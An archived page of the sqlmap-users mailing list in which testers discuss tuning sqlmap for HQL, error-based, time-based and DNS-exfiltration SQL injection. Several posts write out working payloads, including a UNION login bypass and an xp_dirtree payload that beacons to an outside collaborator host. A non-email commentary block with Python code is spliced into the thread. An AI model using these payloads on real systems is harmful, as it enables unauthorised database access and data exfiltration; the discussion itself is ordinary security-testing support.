sqlmap-users Mailing List for sqlmap (Page 2)
Brought to you by: inquisb
From: Chris O. <chr...@gm...> - 2017-02-24 23:14:11

I assume you've tried * for custom injection point and --technique=U? Whether or not it'll dance with HQL is another question entirely.

On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote:
> I've just found an instance of Hibernate Query Language injection that lets me get at an underlying MySQL database if I inject in the right way. Some examples I've got are:
>
> loginName=a - works and gives 200
> loginName=' - fails with HQL error and 500
> loginName=a' or 'a'='a - works and gives 200
> loginName=a\'' - gets through HQL and then generates a MySQL error in a where clause. The injection gets converted to where NAME='a\'''
>
> With some playing I've found that this is a valid injection and they are running as root, as I get a 500 back when I supply root and a 200 when I give something else.
>
> loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" from users where user()="root@localhost" -- '='1
>
> The 500 is because some of the stuff from the union isn't being handled correctly by the page; the 200 is because the union doesn't return any data, so the first bit (basically a=a) is returning valid data and getting through the rest of the parsing.
>
> So I think what I need to do is to tell SQLMap that it is a union injection with 31 fields and that the injection needs to go into here:
>
> loginName=a' and 'a\''="a" <INJECT> -- '='1
>
> Can I do this?
>
> I've got all this set up and running in Burp so I can test things out if anyone needs me to.
>
> Robin
>
> ------------------------------------------------------------------------------
> Check out the vibrant tech community on one of the world's most engaging tech sites, SlashDot.org! http://sdm.link/slashdot
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
From: Robin W. <ro...@di...> - 2017-02-24 22:12:45

I've just found an instance of Hibernate Query Language injection that lets me get at an underlying MySQL database if I inject in the right way. Some examples I've got are:

loginName=a - works and gives 200
loginName=' - fails with HQL error and 500
loginName=a' or 'a'='a - works and gives 200
loginName=a\'' - gets through HQL and then generates a MySQL error in a where clause. The injection gets converted to where NAME='a\'''

With some playing I've found that this is a valid injection and they are running as root, as I get a 500 back when I supply root and a 200 when I give something else.

loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" from users where user()="root@localhost" -- '='1

The 500 is because some of the stuff from the union isn't being handled correctly by the page; the 200 is because the union doesn't return any data, so the first bit (basically a=a) is returning valid data and getting through the rest of the parsing.

So I think what I need to do is to tell SQLMap that it is a union injection with 31 fields and that the injection needs to go into here:

loginName=a' and 'a\''="a" <INJECT> -- '='1

Can I do this?

I've got all this set up and running in Burp so I can test things out if anyone needs me to.

Robin
From: Rodrigo Z. S. <rod...@gm...> - 2017-02-14 16:20:13

I understand your point. But this will be a good thing. This was not the first time that I have had problems with it. Because I only have X calls before the server crashes, obviously I can't dump long data with it. But there are a lot of useful things, like trying to find out if I can read/write a file. I just need one (or a few) calls.

Just to point out one thing: you forget the human side. I can set a big --time-sec and I can see for myself whether it is true or a false positive.

Thanks for this change anyway. It will be useful.

2017-02-14 10:17 GMT-02:00 Miroslav Stampar <mir...@gm...>:
> Hi.
>
> Obviously, don't use --threads in those kinds of situations. Also, --keep-alive could be a good choice together with the (hidden) switch --disable-precon.
>
> As for time-based SQLi. Well, without the (as Brandon mentioned) statistical model, sqlmap will have a problem. Also, if the application is doing "sporadic" timeouts I am not sure how you are expecting sqlmap to detect in the first place whether there was a deliberate delay or not.
>
> Anyway, I've just pushed a change where you can now use --disable-stats for this one thing you are looking for. As for whether sqlmap will now correctly perform tests (with this option it strictly looks at the response times and does a dumb delay inference: delayed if the response time is more than the one given by --time-sec), I kind of doubt it.
>
> Bye
>
> On Mon, Feb 13, 2017 at 5:47 PM, Rodrigo Zanatta Silva <rod...@gm...> wrote:
>> Yes, because with every call I create an error in the server. So I can only make X calls before the pool of connections is full. Then I need to wait for the server to close these connections and try again.
>>
>> 2017-02-13 14:43 GMT-02:00 Brandon Perry <bpe...@gm...>:
>>>> On Feb 13, 2017, at 10:39 AM, Rodrigo Zanatta Silva <rod...@gm...> wrote:
>>>>
>>>> How can I disable sqlmap doing 30 connections before starting the time attack?
>>>
>>> You have to build a statistical model of how quickly the requests generally return to ensure accuracy during a timing attack. You can't get around this. A boolean-based timing attack is going to take a whole lot of requests anyway, are you really worried about an extra 30?
>>>
>>>> Is there an option, or do I need to find it in the code? And where is this set?
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2017-02-14 12:17:39

Hi.

Obviously, don't use --threads in those kinds of situations. Also, --keep-alive could be a good choice together with the (hidden) switch --disable-precon.

As for time-based SQLi. Well, without the (as Brandon mentioned) statistical model, sqlmap will have a problem. Also, if the application is doing "sporadic" timeouts I am not sure how you are expecting sqlmap to detect in the first place whether there was a deliberate delay or not.

Anyway, I've just pushed a change where you can now use --disable-stats for this one thing you are looking for. As for whether sqlmap will now correctly perform tests (with this option it strictly looks at the response times and does a dumb delay inference: delayed if the response time is more than the one given by --time-sec), I kind of doubt it.

Bye

On Mon, Feb 13, 2017 at 5:47 PM, Rodrigo Zanatta Silva <rod...@gm...> wrote:
> Yes, because with every call I create an error in the server. So I can only make X calls before the pool of connections is full. Then I need to wait for the server to close these connections and try again.
>
> 2017-02-13 14:43 GMT-02:00 Brandon Perry <bpe...@gm...>:
>>> On Feb 13, 2017, at 10:39 AM, Rodrigo Zanatta Silva <rod...@gm...> wrote:
>>>
>>> How can I disable sqlmap doing 30 connections before starting the time attack?
>>
>> You have to build a statistical model of how quickly the requests generally return to ensure accuracy during a timing attack. You can't get around this. A boolean-based timing attack is going to take a whole lot of requests anyway, are you really worried about an extra 30?
>>
>>> Is there an option, or do I need to find it in the code? And where is this set?

--
Miroslav Stampar
http://about.me/stamparm
From: daniel <ana...@pr...> - 2017-02-14 01:09:13

Hi all.. first time sending an e-mail to the list =)

My name is Daniel, I'm new to contributing to the project.. I'm trying to implement this kind of payload for the error-based method for MySQL, but I'm having some problems.. The payload I want to implement is:

file.php?id=1 and extractvalue(0x0a,concat(0x0a,(query)))--+

I know that 0x0a is the "ENTER" but it can be changed for other chars.. so I replaced it with ':' .. that would be 0x3a.

I found the error_based.xml file, and I tried some modifications but it keeps not getting the expected results.. I'm trying like this:

<test>
    <title>MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
    <stype>2</stype>
    <level>2</level>
    <risk>1</risk>
    <clause>1,2,3,9</clause>
    <where>1</where>
    <vector>AND EXTRACTVALUE(':',CONCAT(':',([QUERY])))</vector>
    <request>
        <!-- These work as good as ELT(), but are longer
        <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
        <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
        -->
        <payload>and extractvalue(0x3a,concat(':',(select '[DELIMITER_STOP]')))</payload>
    </request>
    <response>
        <grep>':'(?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
    </response>
    <details>
        <dbms>MySQL</dbms>
        <dbms_version>>= 5.1</dbms_version>
    </details>
</test>

And I don't want to test for WHERE, HAVING or ORDER BY... just with AND..

Sorry for my bad English, hope you can understand =)

best regards,
daniel.
github.com/chr0n1c

Sent from ProtonMail (https://protonmail.com), Swiss-based encrypted email.
From: Rodrigo Z. S. <rod...@gm...> - 2017-02-13 16:48:21

Yes, because with every call I create an error in the server. So I can only make X calls before the pool of connections is full. Then I need to wait for the server to close these connections and try again.

2017-02-13 14:43 GMT-02:00 Brandon Perry <bpe...@gm...>:
>> On Feb 13, 2017, at 10:39 AM, Rodrigo Zanatta Silva <rod...@gm...> wrote:
>>
>> How can I disable sqlmap doing 30 connections before starting the time attack?
>
> You have to build a statistical model of how quickly the requests generally return to ensure accuracy during a timing attack. You can't get around this. A boolean-based timing attack is going to take a whole lot of requests anyway, are you really worried about an extra 30?
>
>> Is there an option, or do I need to find it in the code? And where is this set?
From: Brandon P. <bpe...@gm...> - 2017-02-13 16:44:03

> On Feb 13, 2017, at 10:39 AM, Rodrigo Zanatta Silva <rod...@gm...> wrote:
>
> How can I disable sqlmap doing 30 connections before starting the time attack?

You have to build a statistical model of how quickly the requests generally return to ensure accuracy during a timing attack. You can't get around this. A boolean-based timing attack is going to take a whole lot of requests anyway, are you really worried about an extra 30?

> Is there an option, or do I need to find it in the code? And where is this set?
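Brandon's point about the baseline, and Miroslav's description of the dumb fallback that --disable-stats switches to, can be made concrete with a small simulation. What follows is an added example, not code from sqlmap or from anyone in the thread. It imitates a mean-plus-k-standard-deviations rule; the constants (coefficient 7, a 30-sample minimum, a 0.5 s floor) are assumptions recalled from sqlmap's source rather than values quoted on this page, and the two baselines are constructed: a clean one, and one containing the sporadic multi-second timeouts Rodrigo describes.

```python
"""Delay inference for time-based blind SQLi: a fixed --time-sec threshold
versus a threshold learned from a baseline of normal response times.

Added example, not sqlmap's code. The rule imitates the mean + k * stdev
model discussed in the thread; the three constants below are assumptions
recalled from sqlmap's source, not values taken from this page."""
import statistics

TIME_STDEV_COEFF = 7       # assumed: multiplier on the baseline standard deviation
MIN_TIME_RESPONSES = 30    # assumed: samples required before the model is trusted
MIN_VALID_DELAYED = 0.5    # assumed: seconds; nothing faster is ever called a delay

# Constructed baselines in seconds. NOISY_BASELINE adds three sporadic 6 s
# timeouts of the kind a server with an exhausted connection pool produces.
CLEAN_BASELINE = [0.4, 0.5, 0.6] * 10
NOISY_BASELINE = [0.4, 0.5, 0.6] * 9 + [6.0, 6.0, 6.0]


def build_model(samples):
    """Return (mean, population stdev) of the baseline response times."""
    if len(samples) < MIN_TIME_RESPONSES:
        raise ValueError("need at least %d samples, got %d" % (MIN_TIME_RESPONSES, len(samples)))
    return statistics.mean(samples), statistics.pstdev(samples)


def threshold(model):
    """Seconds above which a response counts as deliberately delayed."""
    mean, stdev = model
    return max(MIN_VALID_DELAYED, mean + TIME_STDEV_COEFF * stdev)


def is_delayed_naive(duration, time_sec):
    """The --disable-stats style check: delayed iff the response took at least time_sec."""
    return duration >= time_sec


def is_delayed_statistical(duration, model):
    """Delayed iff the response lies far outside the baseline distribution."""
    return duration >= threshold(model)


def compare(duration, time_sec, baseline):
    """Both verdicts, side by side, for one observed response time."""
    model = build_model(baseline)
    return {
        "naive": is_delayed_naive(duration, time_sec),
        "statistical": is_delayed_statistical(duration, model),
    }


if __name__ == "__main__":
    # 0.6 s: normal; 5.5 s: SLEEP(5) on top of a normal response; 6.0 s: sporadic timeout
    for name, baseline in (("clean", CLEAN_BASELINE), ("noisy", NOISY_BASELINE)):
        print("%s baseline: threshold %.2f s" % (name, threshold(build_model(baseline))))
        for duration in (0.6, 5.5, 6.0):
            print("  %.1f s -> %s" % (duration, compare(duration, 5, baseline)))
```

Run stand-alone it prints both verdicts for a normal response, a response carrying a deliberate 5 s delay, and a 6 s sporadic timeout. On the clean baseline the two methods agree. On the noisy baseline the fixed threshold reports the timeout as a delay (a false positive), while the statistical threshold, inflated by those same timeouts, no longer sees the genuine delay at all: the case Miroslav says neither method can reliably separate, and the reason Rodrigo's "human side" check with a large --time-sec is a sensible complement.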
From: Rodrigo Z. S. <rod...@gm...> - 2017-02-13 16:39:56

How can I disable sqlmap doing 30 connections before starting the time attack? Is there an option, or do I need to find it in the code? And where is this set?
From: Brandon P. <bpe...@gm...> - 2016-12-19 23:14:17

> On Dec 19, 2016, at 5:10 PM, Mark M. <vv...@ho...> wrote:
>
> Right, that makes sense. But at the same time, this is a valid injection (I can reproduce it manually). Perhaps there's information I can provide to someone that would help improve the tool so it would catch this particular case and others like it?

Why not run sqlmap through Burp Suite (--proxy) and manually look at the requests it is making to figure out what the differences are between the request you can make work and the ones sqlmap is trying. Maybe you need a tamper script, or something needs to be massaged that Burp was able to do without intervention.

>
> On Dec 19, 2016, at 5:04 PM, Miroslav Stampar <mir...@gm...> wrote:
>
>> As said, there should be at least one other SQLi technique available. In your case there is NONE. sqlmap will not blindly use dns-exfil if at least one other technique worked.
>>
>> Bye
>>
>> On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@ho...> wrote:
>> Thanks, that's good advice. And I probably should post a little more detail on what I'm running here so others can see it as well.
>>
>> Here's the command executing:
>>
>> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os "Windows" --threads 1
>>         ___
>>        __H__
>>  ___ ___[.]_____ ___ ___  {1.0.12#stable}
>> |_ -| . [)]     | .'| . |
>> |___|_  [']_|_|_|__,|  _|
>>       |_|V          |_|   http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 16:56:14
>>
>> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
>> [16:56:14] [INFO] setting up DNS server instance
>> custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] n
>> [16:56:16] [INFO] testing connection to the target URL
>> [16:56:18] [INFO] testing if the target URL is stable
>> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
>> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
>> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter 'ProductCategory' might not be injectable
>> [16:56:23] [INFO] testing for SQL injection on GET parameter 'ProductCategory'
>> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
>> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
>> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
>> [16:56:39] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
>> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
>> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be injectable
>> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
>> [16:58:03] [WARNING] HTTP error codes detected during run:
>> 500 (Internal Server Error) - 98 times
>>
>> [*] shutting down at 16:58:03
>>
>> And then, my capture results for DNS traffic:
>>
>> root@bass:~# tcpdump -n -i eth0 udp port 53
>> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
>> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
>> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. (30)
>> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? www.testsite.org. (30)
>> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)
>> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
>> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A? www.testsite.org. (30)
>> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA? www.testsite.org. (30)
>> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A 173.213.231.200 (46)
>> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
>> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? www.testsite.org. (30)
>> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA? www.testsite.org. (30)
>> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A 173.213.231.200 (46)
>> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
>> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? www.testsite.org. (30)
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA? www.testsite.org. (30)
>> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A 173.213.231.200 (46)
>> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
>> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? www.testsite.org. (30)
>> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA? www.testsite.org. (30)
>> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A 173.213.231.200 (46)
>> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
>>
>> It doesn't seem like an injection pattern is being tried that is getting the DNS exfiltration to occur... or else I'm doing something else wrong.
>>
>> Thanks,
>>
>> V
>>
>> From: Miroslav Stampar <mir...@gm...>
>> Sent: Monday, December 19, 2016 4:10 PM
>> To: Mark M.
>> Cc: sql...@li...
>> Subject: Re: [sqlmap-users] Sqlmap/DNS exfil
>>
>> I would suggest you run Wireshark or similar when running with --dns-domain to properly debug what is going on. There could be really lots of problems before you fine-tune it (e.g. another service running on :53).
>>
>> About "forcing" sqlmap to use dns-exfil. It will always at least try to test it at the start of a run (if another injection technique is available). Also, it will prefer other "faster" techniques (ERROR and UNION) over dns-exfil. However, there is a hidden switch "--force-dns" which will force the usage of dns-exfil even if ERROR/UNION are available.
>>
>> As said, the best advice I can give you is to run Wireshark during the run and really see what is going on.
>>
>> Bye
>>
>> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...> wrote:
>> I have a situation where Burp has detected the following DNS exfiltration injection for a query parameter in a web app:
>>
>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>>
>> To make that a little easier to read, the injected value is:
>>
>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--
>>
>> I've modified the domain and verified that I receive the DNS requests on my local DNS server (the domain which I provide to sqlmap using the --dns-domain=xxx option) when the injection is manually sent to the page. The problem is, when I pass the request to sqlmap it's not detecting that there's an injection at all. I've provided the OS/DBMS and --level 5, but still no dice. I'm using sqlmap v1.0.12#stable.
>>
>> Since I've gotten many other injections to work in the past, I believe that I'm using sqlmap properly (formatting my request in a file appropriately, specifying the correct parameter to test, etc.) However, it surprised me that what appeared to be a fairly straightforward stacked SQL injection would slip by all of sqlmap's tests. Is there a way to force sqlmap to try DNS exfiltration injections despite no other injection technique succeeding?
>>
>> Thanks
>>
>> V
>>
>> ------------------------------------------------------------------------------
>> Developer Access Program for Intel Xeon Phi Processors
>> Access to Intel Xeon Phi processor-based developer platforms.
>> With one year of Intel Parallel Studio XE.
>> Training and support from Colfax.
>> Order your platform today. http://sdm.link/intel
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2016-12-19 23:13:12

I would say the tool doesn't need to be improved for your case. Please inspect what is going on by manually injecting the testing payloads coming from sqlmap (use for example -v 3). I am pretty sure that something is wrong with your setup or the other end is blocking some of the requests.

Bye

On Tue, Dec 20, 2016 at 12:10 AM, Mark M. <vv...@ho...> wrote:
> Right, that makes sense. But at the same time, this is a valid injection (I can reproduce it manually). Perhaps there's information I can provide to someone that would help improve the tool so it would catch this particular case and others like it?
>
> On Dec 19, 2016, at 5:04 PM, Miroslav Stampar <mir...@gm...> wrote:
>
> As said, there should be at least one other SQLi technique available. In your case there is NONE. sqlmap will not blindly use dns-exfil if at least one other technique worked.
>
> Bye
>
> On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@ho...> wrote:
>> Thanks, that's good advice. And I probably should post a little more detail on what I'm running here so others can see it as well.
>>
>> Here's the command executing:
>>
>> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os "Windows" --threads 1
>>         ___
>>        __H__
>>  ___ ___[.]_____ ___ ___  {1.0.12#stable}
>> |_ -| . [)]     | .'| . |
>> |___|_  [']_|_|_|__,|  _|
>>       |_|V          |_|   http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 16:56:14
>>
>> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
>> [16:56:14] [INFO] setting up DNS server instance
>> custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] n
>> [16:56:16] [INFO] testing connection to the target URL
>> [16:56:18] [INFO] testing if the target URL is stable
>> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
>> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
>> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter 'ProductCategory' might not be injectable
>> [16:56:23] [INFO] testing for SQL injection on GET parameter 'ProductCategory'
>> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
>> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
>> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
>> [16:56:39] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
>> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
>> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be injectable
>> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
>> [16:58:03] [WARNING] HTTP error codes detected during run:
>> 500 (Internal Server Error) - 98 times
>>
>> [*] shutting down at 16:58:03
>>
>> And then, my capture results for DNS traffic:
>>
>> root@bass:~# tcpdump -n -i eth0 udp port 53
>> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
>> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
>> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. (30)
>> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? www.testsite.org. (30)
>> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)
>> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
>> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A? www.testsite.org. (30)
>> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA? www.testsite.org. (30)
>> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A 173.213.231.200 (46)
>> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
>> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? www.testsite.org. (30)
>> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA? www.testsite.org. (30)
>> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A 173.213.231.200 (46)
>> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
>> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? www.testsite.org. (30)
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA? www.testsite.org. (30)
>> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A 173.213.231.200 (46)
>> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
>> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? www.testsite.org. (30)
>> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA? www.testsite.org. (30)
>> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A 173.213.231.200 (46)
>> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
>>
>> It doesn't seem like an injection pattern is being tried that is getting the DNS exfiltration to occur... or else I'm doing something else wrong.
>>
>> Thanks,
>>
>> V
>>
>> ------------------------------
>> From: Miroslav Stampar <mir...@gm...>
>> Sent: Monday, December 19, 2016 4:10 PM
>> To: Mark M.
>> Cc: sql...@li...
>> Subject: Re: [sqlmap-users] Sqlmap/DNS exfil
>>
>> I would suggest you run Wireshark or similar when running with --dns-domain to properly debug what is going on. There could be really lots of problems before you fine-tune it (e.g. another service running on :53).
>>
>> About "forcing" sqlmap to use dns-exfil. It will always at least try to test it at the start of a run (if another injection technique is available). Also, it will prefer other "faster" techniques (ERROR and UNION) over dns-exfil. However, there is a hidden switch "--force-dns" which will force the usage of dns-exfil even if ERROR/UNION are available.
>>
>> As said, the best advice I can give you is to run Wireshark during the run and really see what is going on.
>>
>> Bye
>>
>> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...> wrote:
>>> I have a situation where Burp has detected the following DNS exfiltration injection for a query parameter in a web app:
>>>
>>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>>>
>>> To make that a little easier to read, the injected value is:
>>>
>>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--
>>>
>>> I've modified the domain and verified that I receive the DNS requests on my local DNS server (the domain which I provide to sqlmap using the --dns-domain=xxx option) when the injection is manually sent to the page. The problem is, when I pass the request to sqlmap it's not detecting that there's an injection at all. I've provided the OS/DBMS and --level 5, but still no dice. I'm using sqlmap v1.0.12#stable.
>>>
>>> Since I've gotten many other injections to work in the past, I believe that I'm using sqlmap properly (formatting my request in a file appropriately, specifying the correct parameter to test, etc.) However, it surprised me that what appeared to be a fairly straightforward stacked SQL injection would slip by all of sqlmap's tests. Is there a way to force sqlmap to try DNS exfiltration injections despite no other injection technique succeeding?
>>>
>>> Thanks
>>>
>>> V
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
From: Mark M. <vv...@ho...> - 2016-12-19 23:10:49
|
Right, that makes sense. But at the same time, this is a valid injection (I can reproduce it manually). Perhaps there's information I can provide to someone that would help improve the tool so it would catch this particular case and others like it?

On Dec 19, 2016, at 5:04 PM, Miroslav Stampar <mir...@gm...> wrote:

As said, there should be at least one other SQLi technique available. In your case there is NONE. sqlmap will not blindly use dns-exfil if at least one other technique worked.

Bye

On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@ho...> wrote:

Thanks, that's good advice. And I probably should post a little more detail on what I'm running here so others can see it as well.

Here's the command executing:

root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os "Windows" --threads 1

[...]

--
Miroslav Stampar
http://about.me/stamparm
|
From: Miroslav S. <mir...@gm...> - 2016-12-19 23:06:43
|
